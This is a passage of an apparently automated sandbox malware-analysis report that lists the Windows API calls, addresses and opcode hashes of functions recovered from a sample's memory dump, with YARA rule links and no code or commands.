                                                                                                                                                                        • CreateAcceleratorTableW.USER32(00000000,?,?,?,002DBE96,00000000,00000000,?,00000001,00000002), ref: 002F858C
                                                                                                                                                                        • GetForegroundWindow.USER32(?,002DBE96,00000000,00000000,?,00000001,00000002), ref: 002F8595
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 986409557-113007392
                                                                                                                                                                        • Opcode ID: e3793872458afa7e94bcaa8d39f72db42118fd5569f8da0b00226896f7798d2b
                                                                                                                                                                        • Instruction ID: cd91696ce3117d58c5458326694fdb2f56cce1ae24d43714e2ef1d05f1bdc06b
                                                                                                                                                                        • Opcode Fuzzy Hash: e3793872458afa7e94bcaa8d39f72db42118fd5569f8da0b00226896f7798d2b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B012930611709CFCB25DF69EC88B76B7AAFB043A1F518529F611D62B0DB30A9A4CF40
                                                                                                                                                                        Function 002F8BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00334038,0033407C), ref: 002F8C1A
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 002F8C2C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                        • String ID: 8@3$|@3
                                                                                                                                                                        • API String ID: 3712363035-3526064959
                                                                                                                                                                        • Opcode ID: fbf57d2f2be392362157be771a1916e7bf1a86057faeb4f0553a5abb97412d99
                                                                                                                                                                        • Instruction ID: 97629d1d1e7c5e709f7a04268ebfb73e8d0492852be58bb17b526878b7051426
                                                                                                                                                                        • Opcode Fuzzy Hash: fbf57d2f2be392362157be771a1916e7bf1a86057faeb4f0553a5abb97412d99
                                                                                                                                                                        • Instruction Fuzzy Hash: 1DF05EB6651314BBF3156B60ACC9F77BE9CEB04390F000021BB08E61A1E6756C14CBB9
                                                                                                                                                                        Function 002BE778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 002BE797
                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 002BE7BD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                        • API String ID: 3013587201-2590602151
                                                                                                                                                                        • Opcode ID: f01b827a13bd4be0ef1471578c2624025106b3e835a9f67516a3e0408f1781a0
                                                                                                                                                                        • Instruction ID: b1da9ae935db3ebc222b783988b2e7f04fcab489b420988b2868ba657bab3248
                                                                                                                                                                        • Opcode Fuzzy Hash: f01b827a13bd4be0ef1471578c2624025106b3e835a9f67516a3e0408f1781a0
                                                                                                                                                                        • Instruction Fuzzy Hash: 1CE02B71832532DFDF728B205C98EFB73296F107C0B160574E906E2000DB70CC64C654
                                                                                                                                                                        Function 002C096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6c512a8aafd68af9f14bbe83f746c69bc0a691f3b3b83ddec0789e9421e8b2be
                                                                                                                                                                        • Instruction ID: a62e7cf0fc36ccf3e01117279e083e101024fbb8245e494a3505c571e8355dbb
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c512a8aafd68af9f14bbe83f746c69bc0a691f3b3b83ddec0789e9421e8b2be
                                                                                                                                                                        • Instruction Fuzzy Hash: 61C15975A1020AEFDB04CF94C884FAEB7B5FF48708F108699E505AB251D771EE91CB90
                                                                                                                                                                        Function 002941F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                        • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                        • Instruction ID: 6a1493ceb34ad4b1643135825c85e0959e0c9533d2ff9bd337e5ac282c4cd69a
                                                                                                                                                                        • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                        • Instruction Fuzzy Hash: F4A169719303869FEF11EF28C891FAEBBE4EF15314F2442ADE9559B281C2349962CB54
                                                                                                                                                                        Function 002C0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00300BD4,?), ref: 002C0EE0
                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00300BD4,?), ref: 002C0EF8
                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,002FDCE0,000000FF,?,00000000,00000800,00000000,?,00300BD4,?), ref: 002C0F1D
                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 002C0F3E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 314563124-0
                                                                                                                                                                        • Opcode ID: f11dd4861c20d23e25002da12dc009bb2894b432165f9a715f74c47e3addf310
                                                                                                                                                                        • Instruction ID: 528feef782b3febef5c985d9827a4d6b2bb9684fe4fc437d2c296a764d7d1f2b
                                                                                                                                                                        • Opcode Fuzzy Hash: f11dd4861c20d23e25002da12dc009bb2894b432165f9a715f74c47e3addf310
                                                                                                                                                                        • Instruction Fuzzy Hash: 29811971A1010AEFCB14DF94C984EEEB7B9FF89315F204598F506AB250DB71AE46CB60
                                                                                                                                                                        Function 002EB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 002EB10C
                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 002EB11A
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 002EB1FC
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002EB20B
                                                                                                                                                                          • Part of subcall function 0027E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,002A4D73,?), ref: 0027E395
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1991900642-0
                                                                                                                                                                        • Opcode ID: a2ada50076621eabf07992331a2e6f92923e2c1543936f28ab186c4614dd0794
                                                                                                                                                                        • Instruction ID: 333d82b8949523a61f9827bb924406192e2034f0c46f3f35e24fc88a85e9a182
                                                                                                                                                                        • Opcode Fuzzy Hash: a2ada50076621eabf07992331a2e6f92923e2c1543936f28ab186c4614dd0794
                                                                                                                                                                        • Instruction Fuzzy Hash: E7516AB1518300AFD311EF24D886A6BBBE8FF88754F40492DF58997291EB30D964CF92
                                                                                                                                                                        Function 002A1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                        • Opcode ID: b1f3fc965b71cec34be93d6af588696f3110c08c440c3a403799a09fff83bc27
                                                                                                                                                                        • Instruction ID: eebac77ab00c065df2d33bc0e37aea05879caf7c2700ee8ba527691ba635a7d7
                                                                                                                                                                        • Opcode Fuzzy Hash: b1f3fc965b71cec34be93d6af588696f3110c08c440c3a403799a09fff83bc27
                                                                                                                                                                        • Instruction Fuzzy Hash: 63415635A31111AFEB207EB98C46ABE7BA8EF07370F144225F428D61D1EF7849714BA1
                                                                                                                                                                        Function 002E2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 002E255A
                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 002E2568
                                                                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002E25E7
                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 002E25F1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$socket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1881357543-0
                                                                                                                                                                        • Opcode ID: 5ef19a3e5209a16772f36c3f1babab717e111e8beaceb231ebe42d759a939a41
                                                                                                                                                                        • Instruction ID: 6711d1617d60cad65a0bb6fdc1b847768fe0cd5624e601caebf9d486866330ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ef19a3e5209a16772f36c3f1babab717e111e8beaceb231ebe42d759a939a41
                                                                                                                                                                        • Instruction Fuzzy Hash: 3241F674A50201AFE721AF24C886F2577E9AF04758F94C45CF51A8F2D2D772EDA1CB90
                                                                                                                                                                        Function 002F6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002F6D1A
                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 002F6D4D
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 002F6DBA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                                                        • Opcode ID: 18a2d324c451e51fb2476d4af84e84145a339cb4816a044d1574c505e1f0538b
                                                                                                                                                                        • Instruction ID: a999ea1c62810dfca0edab21eb3e2fe4568c01e80ed02c13f1c2774e8ba6264d
                                                                                                                                                                        • Opcode Fuzzy Hash: 18a2d324c451e51fb2476d4af84e84145a339cb4816a044d1574c505e1f0538b
                                                                                                                                                                        • Instruction Fuzzy Hash: AC513275A10209EFDF14DF54D8849BEBBB6FF443A0F104169F91597290D730AD91CB50
                                                                                                                                                                        Function 0029B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 911b6a470affc09935fda0a07aa8498a1a7ab6c8f38806adbae8cf9d8f684743
                                                                                                                                                                        • Instruction ID: 8b1a4668abb5048e4a5bf6d276c161d51ed8542d917fd1ae92172d29fb0f30f0
                                                                                                                                                                        • Opcode Fuzzy Hash: 911b6a470affc09935fda0a07aa8498a1a7ab6c8f38806adbae8cf9d8f684743
                                                                                                                                                                        • Instruction Fuzzy Hash: 60412D75920704FFDB26AF78DD41BAABBECFB88710F108629F011DB691D77199218B80
                                                                                                                                                                        Function 002D611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002D61C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 002D61EE
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002D6213
                                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002D623F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                                                        • Opcode ID: 6af9cd99324cc6017e21c05abe1e92e1994e208c8e3c41299fce7aeb40f1e705
                                                                                                                                                                        • Instruction ID: d8adc424744cfbf09d795a6c437ed0254d0f145457c73265ee3e13d6d70afc6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 6af9cd99324cc6017e21c05abe1e92e1994e208c8e3c41299fce7aeb40f1e705
                                                                                                                                                                        • Instruction Fuzzy Hash: 42414A39610611DFCB11EF14C549A1ABBE2EF89320B198489ED5A9B362CB31FC51CF91
                                                                                                                                                                        Function 002CB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 002CB473
                                                                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 002CB48F
                                                                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 002CB4FD
                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 002CB54F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                        • Opcode ID: b5d132260754b510452f95be8fbff238bc5b1e014130325ebb18589337d4f548
                                                                                                                                                                        • Instruction ID: a58559e7ea9f77df6c862ca113abbe40f69d87ee3fb1181477e96e452be92fcf
                                                                                                                                                                        • Opcode Fuzzy Hash: b5d132260754b510452f95be8fbff238bc5b1e014130325ebb18589337d4f548
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E318B70A242496EFF36CF649C1AFFABBB6AB48350F44431EE091961D2C3748D65C7A1
                                                                                                                                                                        Function 002CB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 002CB5B8
                                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 002CB5D4
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 002CB63B
                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 002CB68D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                        • Opcode ID: 647b1d55422b67d384e8a5cb011567f86f0fb8d9c1991ab9b3aa3bbace93d4ea
                                                                                                                                                                        • Instruction ID: 6aa61df39610d98cc98107ee1951295aecba939b8c1df8b58c3bcbab25d52199
                                                                                                                                                                        • Opcode Fuzzy Hash: 647b1d55422b67d384e8a5cb011567f86f0fb8d9c1991ab9b3aa3bbace93d4ea
                                                                                                                                                                        • Instruction Fuzzy Hash: 51313B30D206095EFF268F64C80AFFB7BAEAF84310F24432EE481861D1C3748965DB51
                                                                                                                                                                        Function 002F80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 002F80D4
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002F814A
                                                                                                                                                                        • PtInRect.USER32(?,?,?), ref: 002F815A
                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 002F81C6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
